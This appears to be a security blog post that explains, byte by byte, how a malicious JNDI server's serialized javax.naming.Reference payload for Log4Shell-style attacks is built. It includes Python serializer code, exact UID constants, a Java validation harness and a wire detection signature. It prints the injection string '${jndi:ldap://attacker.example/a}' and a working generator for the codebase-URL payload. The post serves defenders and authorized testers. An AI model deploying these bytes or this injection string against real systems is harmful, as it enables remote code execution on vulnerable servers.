What is a JNDI Reference in a Log4Shell-style attack?

A javax.naming.Reference is the Java object a malicious LDAP or RMI server returns when a vulnerable app performs a JNDI lookup. If its classFactoryLocation points to an attacker-controlled codebase URL and the JVM trusts remote codebases, the JVM fetches and instantiates that factory class, which is the remote code execution.

Why does serialVersionUID matter in a JNDI deserialization payload?

serialVersionUID is a 64-bit fingerprint of the class. If the value in the serialized stream doesn't exactly match the victim's Reference class, deserialization throws InvalidClassException and aborts before it ever reaches the payload. The bytes must be exact, so it's safest to encode the UID from the signed long rather than a hand-copied hex constant.

Why do Java field type signatures use slashes but array class names use dots?

A field type signature uses the JVM field-descriptor form with slashes ([Ljava/lang/Object;), while an array object's class descriptor name uses whatever Class.getName() returns, which for array classes uses dots ([Ljava.lang.Object;). The read side calls Class.forName() on it, so spelling the array's classdesc with slashes causes a ClassNotFoundException.

Hand-rolling the JNDI Reference: what the JVM actually deserializes

How can you detect a malicious JNDI response on the wire?

Look for a Java serialization stream starting with the magic bytes AC ED 00 05, a TC_CLASSDESC named javax.naming.Reference, and a classFactoryLocation string carrying an LDAP or HTTP URL you don't control. Legitimate traffic almost never ships a Reference with a remote codebase over an untrusted channel, so the false-positive rate is low.

Quick note before we start: this is about the wire format, for defenders and people doing authorized testing. There’s no turnkey exploit here, no gadget chain, nothing you can copy-paste to pop a box. The point is to know what the bytes look like so you can spot them.

You’ve seen the Log4Shell string a hundred times:

${jndi:ldap://attacker.example/a}

And you’ve probably read the stock explanation that goes with it: the server does a JNDI lookup, the attacker’s LDAP server hands back a reference to a remote class, and the JVM downloads and runs it.

That’s technically true, and I’ve never found it useful. It skips the only part that’s actually interesting: the whole attack hinges on one object that the victim JVM deserializes, and that object has to be byte-perfect or nothing happens at all — it just quietly fails and you’re left wondering why.

So I decided to build the server side of it myself. No JNDI, no RMI library, not even ObjectOutputStream — just a byte buffer and the spec. I figured I understood the format. Turns out there’s a real gap between “I read the spec” and “a real JVM accepts it,” and that gap cost me two bugs I never would have caught without running the bytes through an actual JVM.

This post is that object, byte for byte, including both bugs.

The setup: who serializes what

When a vulnerable app calls ctx.lookup("ldap://you/a") (or rmi://you/a), your malicious directory server gets to return exactly one thing: a serialized Java object. If that object happens to be a javax.naming.Reference with a classFactoryLocation set to a codebase URL, and the victim is running with com.sun.jndi.ldap.object.trustURLCodebase=true (the default on JDKs older than 8u191 and 11.0.1, the releases that flipped it to false), then NamingManager.getObjectInstance fetches the factory class from your URL and instantiates it. That instantiation is the RCE. That’s the whole game.

So the entire server-side payload boils down to one job: emit a serialized javax.naming.Reference whose className, classFactory, and classFactoryLocation are yours.

Now, you could absolutely shell out to ysoserial or stand up a real LDAP server and let it do this for you. I didn’t want to. Partly it’s the no-dependencies thing, but mostly it’s that you can’t really detect or explain something you can only produce by calling a library that hides all the interesting bits from you. If I’m going to write a detection signature for this, I want to have typed the bytes myself. Here’s what that takes.

The Java serialization stream, in just enough detail

A serialized stream starts with a 4-byte header:

AC ED 00 05      STREAM_MAGIC (0xACED) + STREAM_VERSION (0x0005)
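As a quick illustration of that header, here is a minimal sketch of a check for it. The function name has_serialization_header is made up for this example; the two constants are the values shown above.

```python
import struct

STREAM_MAGIC = 0xACED    # first two bytes of every serialization stream
STREAM_VERSION = 0x0005  # next two bytes

def has_serialization_header(data: bytes) -> bool:
    """Return True if data begins with the 4-byte Java serialization header."""
    if len(data) < 4:
        return False
    # Both values are unsigned 16-bit big-endian integers.
    magic, version = struct.unpack(">HH", data[:4])
    return magic == STREAM_MAGIC and version == STREAM_VERSION

print(has_serialization_header(bytes.fromhex("aced000573")))
print(has_serialization_header(b"GET / HTTP/1.1"))
```

This only looks at offset 0. On a real LDAP connection the stream sits inside an encoded attribute value, so a detector would search for the four bytes rather than expect them at the start.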

After that it’s a sequence of typed records. Here are the only ones we care about:

Marker	Byte	Meaning
`TC_OBJECT`	`0x73`	a new object follows (its class desc, then field values)
`TC_CLASSDESC`	`0x72`	a class descriptor: name, serialVersionUID, flags, fields
`TC_STRING`	`0x74`	a string (2-byte length + modified-UTF-8)
`TC_ARRAY`	`0x75`	an array object
`TC_ENDBLOCKDATA`	`0x78`	end of a class’s optional block data
`TC_NULL`	`0x70`	null (e.g. “no superclass”)

An object on the wire looks like this: TC_OBJECT, then a class descriptor (the class name, plus serialVersionUID, plus flags, plus the ordered list of field declarations, plus a null meaning “no superclass”), and then the field values in the exact order the descriptor declared them. Strings normally get written once and then back-referenced later with TC_REFERENCE by handle number, which is great for size but miserable to hand-encode. If you just emit every string fresh as its own TC_STRING, the handle numbering stops mattering and your bytes become self-contained. That’s the one trick that makes doing this by hand bearable: never back-reference, always emit fresh.

javax.naming.Reference, field by field

Reference declares four serializable fields. The JVM doesn’t serialize them in declaration order; it uses a canonical order: primitives first, then objects, with each group sorted alphabetically by field name. Reference has no primitive fields, so for us that just means four objects in alphabetical order:

addrs                 Vector       (the RefAddr list; must NOT be null)
classFactory          String       (the factory class name)
classFactoryLocation  String       (the codebase URL — the payload)
className             String       (class name of the object the Reference stands for)
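The ordering rule is easy to get wrong by eye, so here is a small sketch of it. The function canonical_field_order and the (name, descriptor) tuple layout are illustrative choices, not anything the JDK exposes; the input list is deliberately shuffled.

```python
def canonical_field_order(fields):
    """Sort (name, descriptor) pairs: primitives first, then objects, each group by name.

    A descriptor starting with 'L' (object) or '[' (array) counts as an object type;
    anything else (I, J, Z, ...) is a primitive.
    """
    def is_object(descriptor):
        return descriptor[0] in "L["
    # False sorts before True, so primitives come first; ties break on the field name.
    return sorted(fields, key=lambda f: (is_object(f[1]), f[0]))

shuffled = [
    ("className", "Ljava/lang/String;"),
    ("classFactoryLocation", "Ljava/lang/String;"),
    ("addrs", "Ljava/util/Vector;"),
    ("classFactory", "Ljava/lang/String;"),
]

for name, descriptor in canonical_field_order(shuffled):
    print(f"{name:22}{descriptor}")
```

Note that classFactory sorts before classFactoryLocation because it is a prefix of it, and both sort before className because 'F' precedes 'N'.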

So the class descriptor is:

72                                  TC_CLASSDESC
00 16 "javax.naming.Reference"      class name (2-byte len + UTF-8)
E8 C6 9E A2 A8 E9 8D 09             serialVersionUID
02                                  flags = SC_SERIALIZABLE
00 04                               4 fields
  4C 00 05 "addrs"                 'L' obj field, name "addrs"
    74 00 12 "Ljava/util/Vector;"  field type signature
  4C 00 0C "classFactory"
    74 00 12 "Ljava/lang/String;"
  4C 00 14 "classFactoryLocation"
    74 00 12 "Ljava/lang/String;"
  4C 00 09 "className"
    74 00 12 "Ljava/lang/String;"
78 70                               TC_ENDBLOCKDATA, TC_NULL (no superclass)

Then come the field values, in that same order: the addrs Vector first, then three TC_STRINGs for factory, codebase, and className. Here it is in Python, emitting the raw bytes:

def serialize_reference(class_name, factory, codebase):
    cd  = bytes([TC_CLASSDESC]) + _utf("javax.naming.Reference") + _REFERENCE_SUID
    cd += bytes([SC_SERIALIZABLE]) + (4).to_bytes(2, "big")
    cd += _obj_field("addrs", "Ljava/util/Vector;")
    cd += _obj_field("classFactory", "Ljava/lang/String;")
    cd += _obj_field("classFactoryLocation", "Ljava/lang/String;")
    cd += _obj_field("className", "Ljava/lang/String;")
    cd += bytes([TC_ENDBLOCKDATA, TC_NULL])

    obj  = bytes([TC_OBJECT]) + cd
    obj += _empty_vector()          # addrs
    obj += _tc_string(factory)      # classFactory
    obj += _tc_string(codebase)     # classFactoryLocation
    obj += _tc_string(class_name)   # className
    return obj

Looks finished, right? It isn’t. There are two things wrong with the obvious version of this code, and neither one shows up until you feed the bytes to an actual JVM.

Bug #1: the serialVersionUID you can’t eyeball

serialVersionUID is a 64-bit fingerprint for the class. If the value in your stream doesn’t match the victim’s Reference class exactly, deserialization throws InvalidClassException and bails out before it ever looks at your payload. The good news is that Reference declares its UID explicitly in the JDK source, so it’s stable across JDK versions. You just have to get the number right.

My first version had a hex constant that looked right and was completely wrong:

e8 c6 9d 98 ...     WRONG (eyeballed)
e8 c6 9e a2 a8 e9 8d 09   correct  (= -1673475790065791735)

Two bytes off. And here’s the part that stung: my unit test compared the emitted bytes against that same constant, so of course it passed. The test could only ever catch me disagreeing with myself. It had no way to catch me disagreeing with the JVM, which is the only disagreement that matters. The fix is to encode from the signed long directly instead of a hand-copied hex string, so there’s one source of truth:

_REFERENCE_SUID = (-1673475790065791735).to_bytes(8, "big", signed=True)  # e8c69ea2a8e98d09
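A small cross-check along the same lines, as a sketch: encode the signed long and compare it with any hex dump you typed by hand. The helper names suid_bytes and hex_matches_long are made up for this example.

```python
def suid_bytes(value: int) -> bytes:
    """Encode a Java long serialVersionUID as 8 big-endian two's-complement bytes."""
    return value.to_bytes(8, "big", signed=True)

def hex_matches_long(hex_text: str, value: int) -> bool:
    """True if a hand-typed hex dump is the encoding of the given signed long."""
    # bytes.fromhex skips the spaces between byte pairs.
    return bytes.fromhex(hex_text) == suid_bytes(value)

REFERENCE_SUID_LONG = -1673475790065791735  # the value quoted above

print(suid_bytes(REFERENCE_SUID_LONG).hex())                              # e8c69ea2a8e98d09
print(hex_matches_long("e8 c6 9e a2 a8 e9 8d 09", REFERENCE_SUID_LONG))   # True
```

This catches transcription slips between the two notations. It cannot tell you whether the long itself is the one the victim's class declares; only a real JVM can.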

This is basically the whole reason I wanted to write this up: a test that checks your output against your own assumption isn’t a test. You need something to check against that doesn’t already share your bug.

Bug #2: dots vs. slashes (the one that really hurts)

Reference.addrs has to be a real Vector, not null, because NamingManager.getObjectInstance walks it and throws an NPE if it’s null. So I embed a serialized empty Vector whose elementData is an Object[0]. That Vector carries its own class descriptor, and inside it the element array carries yet another class descriptor of its own. This is where two strings that look identical are actually governed by two different rules:

# Vector.elementData FIELD type signature -> field-descriptor form, SLASHES:
cd += b"\x5b" + _utf("elementData") + _tc_string("[Ljava/lang/Object;")

# ...but the element ARRAY's OWN classdesc name -> Class.getName() form, DOTS:
arr_cd = bytes([TC_CLASSDESC]) + _utf("[Ljava.lang.Object;") + _OBJ_ARRAY_SUID

Both strings are nineteen characters long and differ only in the separator, slash versus dot, yet each spot has its own correct answer:

– A field type signature (the declared type of a field) uses the JVM field-descriptor form: [Ljava/lang/Object;, with slashes.
– An array object’s class descriptor name is whatever Class.getName() returns, because on the read side the JVM calls Class.forName() on it. For array classes that comes out as [Ljava.lang.Object;, with dots.

Spell the array’s classdesc name with slashes and the JVM throws ClassNotFoundException, because Class.forName() goes looking for java.lang.Object written with slashes, and no class exists under that name. And naturally my structural test emitted slashes in both spots, because both of them “looked like” the same type string to me. The only thing that caught it was deserializing in a real JVM.
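One way to keep the two forms apart is to give each its own function, so the call site names the rule being applied. This is only a sketch; field_signature and array_classdesc_name are hypothetical helper names, and both assume an object (non-primitive) element type.

```python
def field_signature(binary_name: str, dims: int = 0) -> str:
    """JVM field-descriptor form, used for a field's declared type (slashes)."""
    return "[" * dims + "L" + binary_name.replace(".", "/") + ";"

def array_classdesc_name(binary_name: str, dims: int = 1) -> str:
    """Class.getName() form of an object array, used as a classdesc name (dots)."""
    if dims < 1:
        raise ValueError("an array class needs at least one dimension")
    return "[" * dims + "L" + binary_name + ";"

sig = field_signature("java.lang.Object", dims=1)
name = array_classdesc_name("java.lang.Object")
print(sig)    # [Ljava/lang/Object;
print(name)   # [Ljava.lang.Object;
print(len(sig), len(name), sig == name)
```

The two outputs have the same length and are still different strings, which is exactly why a test that compares them by eye lets the bug through.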

One more while we’re in here: the third UID in the stream (after Reference’s and Vector’s), the one for [Ljava.lang.Object;, isn’t a constant declared in source at all. Array classes get a computed UID (90ce589f1073296c), and it was the round-trip that finally confirmed I had it right.

The oracle: 20 lines of Java

The fix for “my test shares my bug” is to deserialize the bytes in something that doesn’t share it. The whole validator is throwaway code:

// Check.java — deserialize our hand-emitted bytes in a real JVM and assert the fields.
import java.io.*;
import javax.naming.Reference;

public class Check {
    public static void main(String[] a) throws Exception {
        byte[] bytes = java.nio.file.Files.readAllBytes(java.nio.file.Path.of(a[0]));
        Object o = new ObjectInputStream(new ByteArrayInputStream(bytes)).readObject();
        Reference r = (Reference) o;
        System.out.println("className=" + r.getClassName());
        System.out.println("factory=" + r.getFactoryClassName());
        System.out.println("codebase=" + r.getFactoryClassLocation());
        System.out.println("addrs=" + r.size());   // 0, and crucially not an NPE
    }
}

Dump your bytes to a file with the 4-byte AC ED 00 05 header prepended, then run it through a throwaway container:

docker run --rm -v "$PWD":/w -w /w eclipse-temurin:21 \
  sh -c "javac Check.java && java Check reference.ser"

If it prints your className, factory, and codebase with addrs=0 instead of a stack trace, the bytes are real. That one green run is what moved all three UIDs and the dots-versus-slashes fix from “I’m pretty sure” to “the JVM agrees with me.” I run it after every single change to the serializer, because the in-process structural test still can’t catch a wrong constant, and never will — that’s the whole point.
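The dump step that feeds the validator can be as small as the sketch below. write_stream is a name invented for this example, and the body argument stands for whatever the serializer returned, without the header.

```python
from pathlib import Path

STREAM_HEADER = bytes.fromhex("aced0005")  # STREAM_MAGIC + STREAM_VERSION

def write_stream(path: str, body: bytes) -> int:
    """Write header + body to path and return the total number of bytes written."""
    if body.startswith(STREAM_HEADER):
        # Guard against prepending the header twice, which a JVM would reject.
        raise ValueError("body already starts with the stream header")
    data = STREAM_HEADER + body
    Path(path).write_bytes(data)
    return len(data)
```

In this post's setup the call would be write_stream("reference.ser", serialize_reference(...)), with the file landing in the directory that the container mounts.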

Detection signature

The upside of doing all this by hand is that now you know exactly what a malicious JNDI response looks like on the wire: a serialization stream starting with AC ED 00 05, a TC_CLASSDESC named javax.naming.Reference, and a classFactoryLocation string carrying an LDAP or HTTP URL you don’t control. That’s a signature you can match in a proxy, a WAF, or an egress monitor, and the false-positive rate is low because nobody legitimately ships a Reference with a remote codebase over an untrusted channel.
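Here is a rough sketch of that signature as a byte-level scanner. It is deliberately naive and every name in it is illustrative: it searches a captured payload for the stream header and the Reference class descriptor, then walks the TC_STRING records after it and returns any that start with a URL scheme. Deciding whether a URL is one "you don't control" is left to the caller.

```python
STREAM_HEADER = bytes.fromhex("aced0005")
# TC_CLASSDESC (0x72), 2-byte length 0x0016, then the class name.
REFERENCE_CLASSDESC = b"\x72\x00\x16javax.naming.Reference"
URL_SCHEMES = (b"http://", b"https://", b"ldap://", b"ldaps://")
TC_STRING = b"\x74"

def find_reference_codebase_urls(payload: bytes) -> list:
    """Return URL-looking TC_STRING values that follow a javax.naming.Reference classdesc."""
    if STREAM_HEADER not in payload or REFERENCE_CLASSDESC not in payload:
        return []
    hits = []
    start = payload.index(REFERENCE_CLASSDESC) + len(REFERENCE_CLASSDESC)
    i = payload.find(TC_STRING, start)
    while i != -1:
        # Treat every 0x74 byte as a candidate record: 2-byte length, then the text.
        length = int.from_bytes(payload[i + 1:i + 3], "big")
        text = payload[i + 3:i + 3 + length]
        # Candidates whose declared length runs past the payload are ignored.
        if len(text) == length and text.lower().startswith(URL_SCHEMES):
            hits.append(text.decode("ascii", "replace"))
        i = payload.find(TC_STRING, i + 1)
    return hits
```

Because it never parses the stream properly, a string written as a back-reference or split across packets would slip past it. Treat it as a starting point for a proxy or egress rule, not a complete detector.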

Notice that neither of my bugs was in reading the spec. Both were in checking my work. A test that compares your output to your own constant is theater — it feels like verification and verifies nothing. When you’re emitting a format that some other system has to consume, that other system is your only real oracle. “It serializes” and “a JVM will actually deserialize it” are two different claims, and only the second one is worth anything.

To be clear, this Reference path is the clean, educational version. In an actual engagement the workhorse is the raw-bytes route: take a complete serialized gadget stream from ysoserial or marshalsec, strip its 4-byte header, and embed the object body directly. That route is better precisely because it’s JVM-independent and you never have to hand-encode anyone’s serialVersionUID. But I don’t think you really understand what it’s doing until you’ve built the simple object by hand once and watched a JVM accept it.

This is part of a series I’m writing on building OAST infrastructure from scratch — authoritative DNS, multi-protocol callback listeners, a sandboxed Python runtime for the response logic. Next up is the DNS server you need to catch these callbacks in the first place.
